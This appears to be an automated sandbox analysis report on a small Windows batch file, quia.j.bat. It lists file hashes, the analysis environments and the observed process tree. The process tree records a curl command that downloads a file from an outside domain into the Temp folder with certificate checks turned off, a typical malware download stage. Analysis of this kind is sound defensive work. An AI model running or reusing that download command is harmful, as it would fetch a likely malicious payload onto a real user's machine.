Analysis
- max time kernel: 68s
- max time network: 75s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 25-01-2024 17:02
Static task: static1
Behavioral task: behavioral1
- Sample: quia.j.bat
- Resource: win7-20231215-en (windows7-x64)
- 0 signatures
- 150 seconds
General
- Target: quia.j.bat
- Size: 133B
- MD5: 6c5a557069319c0ff00434150d32e97a
- SHA1: 2b27ca6080f644bf97b7157f868af1f49f1a4916
- SHA256: 530aedacb0c00ded2e6c989d9d1885f5f92a6eca74368f9b49c3954821fef1c2
- SHA512: a57db26944c39772d4b978f47f9db6174551d7dc6e138e35072ef7e27887ca9565a24469df1670897c4caeb72df03ad8fd0b92a8e6f2049b16465d77dc56e3e3
Malware Config
Signatures
Processes
- C:\Windows\system32\cmd.exe (PID: 2412)
  - Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quia.j.bat"
  - Suspicious use of WriteProcessMemory
  - Child process: C:\Windows\system32\curl.exe (PID: 820)
    - Command line: curl "https://filersed.com/IHq/506593203" --output "C:\Users\Admin\AppData\Local\Temp\qui.k" --ssl-no-revoke --insecure --location